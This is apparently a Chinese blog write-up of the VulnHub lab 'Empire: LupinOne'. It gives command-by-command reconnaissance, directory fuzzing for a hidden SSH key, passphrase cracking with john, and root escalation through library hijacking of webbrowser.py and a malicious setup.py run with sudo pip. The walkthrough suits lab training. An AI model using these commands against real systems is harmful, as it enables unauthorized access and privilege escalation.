VulnHub日记(十六):Empire: LupinOne

参考链接

Vulnhub:Empire: LupinOne
参考博客

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.138
发现主机,nmap扫描

fping -aqg 192.168.56.0/24
nmap -A 192.168.56.138

在这里插入图片描述

访问http页面,同时目录枚举

 dirsearch -u 192.168.56.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,zip,bak

在这里插入图片描述
在nmap扫到的robots.txt中,不允许访问~myfiles 文件,于是fuzz类似文件名,发现~secret文件夹

ffuf -c -r -u 'http://192.168.56.138/~FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0 

在这里插入图片描述
访问,是一段文字,内容为在该目录下有ssh私钥文件,需要继续枚举,由于私钥文件一般是在.ssh文件夹下,所以按照".FUZZ"的思路枚举,又由于是私钥文件,需要考虑添加后缀

ffuf -c -r -u 'http://192.168.56.138/~secret/.FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt,.html -fs 0 

在这里插入图片描述
在这里插入图片描述
查看该文件

http://192.168.56.138/~secret/.mysecret.txt

在这里插入图片描述
明显不是明文私钥,需要解密,这里用到在线解密dcode.fr
在这里插入图片描述
base58编码概率大,使用该方式分析,获得私钥明文,保存到本地文件,我创建的文件名为id_rsa
在这里插入图片描述
之后使用ssh2john爆破私钥密码

/ssh2john.py id_rsa | tee hash
john hash --wordlist=rockyou.txt 
#这里没有想到/~secrets/里的提示,字典选的不对,应该选提示里说到的fasttrack.txt
john hash --wordlist=/usr/share/wordlists/fasttrack.txt

在这里插入图片描述
登陆成功,拿到userFLAG
在这里插入图片描述
看有没有特殊权限命令

sudo -l

在这里插入图片描述
arsene用户免密root执行heist.py ,看完文件,发现没有其余信息,只能从这个py文件入手,查看该文件,调用了一个webbrowser库
在这里插入图片描述
查找这个库,或者查找可编辑文件

find / -writable ! -path '/proc*' ! -path '/sys*' ! -path '/dev*' -exec ls -al {} \; 2>/dev/null

在这里插入图片描述
编辑webbrowser.py,利用该文件获取arsene的shell

echo import os >webbrowser.py
echo os.system("/bin/bash")>>webbrowser.py
#或者弹一个shell到本机也可以

在这里插入图片描述

sudo -u arsene /usr/bin/python 3.9 /home/arsene/heist.py

在这里插入图片描述

sudo -l

在这里插入图片描述
pip提权利用

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

在这里插入图片描述
拿到root FLAG
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值